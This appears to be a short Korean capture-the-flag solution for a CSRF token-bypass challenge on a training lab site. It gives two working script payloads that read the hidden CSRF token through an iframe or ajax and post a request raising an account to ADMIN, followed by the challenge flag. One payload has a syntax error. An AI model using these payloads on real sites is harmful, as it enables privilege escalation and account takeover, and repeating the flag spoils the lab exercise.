==================================
* CSRF 문제 3번
==================================
[풀이과정]

1. 공격 구문
1> csrf 내의 토큰값 가져오기
<input type="hidden" name="csrfToken" value="f8d48c0f-2b30-4e0a-8262-d46cb80352d1">

1.1> iframe 사용
<iframe id="atfrm" src="https://lab.eqst.co.kr:8444/csrfToken/update_role.jsp?selectedMenu=%EA%B6%8C%ED%95%9C%EB%B3%80%EA%B2%BD"></iframe><script>window.onload=function(){var iframe = document.getElementById("atfrm");var token = iframe.contentWindow.document.getElementsByName('csrfToken')[0].value; alert(token); $.ajax({url:'https://lab.eqst.co.kr:8444/csrfToken/update_role.jsp', data:'target_id=hihihi@hihihi.hihihi&new_role=ADMIN_csrfToken&csrfToken='token});}</script>

1-2> ajax 사용
<script>$.ajax({url:'https://lab.eqst.co.kr:8444/csrfToken/update_role.jsp?selectedMenu=%EA%B6%8C%ED%95%9C%EB%B3%80%EA%B2%BD', success: function(data) {var csrfTok=$(data).find('input[name="csrfToken"]').val(); $.ajax({url:'https://lab.eqst.co.kr:8444/csrfToken/update_role_ok_csrfToken.jsp',method:'post',data:"csrfToken="+csrfTok+"&target_id=hihihi@hihihi.hihihi&new_role=ADMIN_csrfToken", });}});</script>

2. 정답
EQST{c5rfT0k3n_byp4ss_FlA9}
==================================

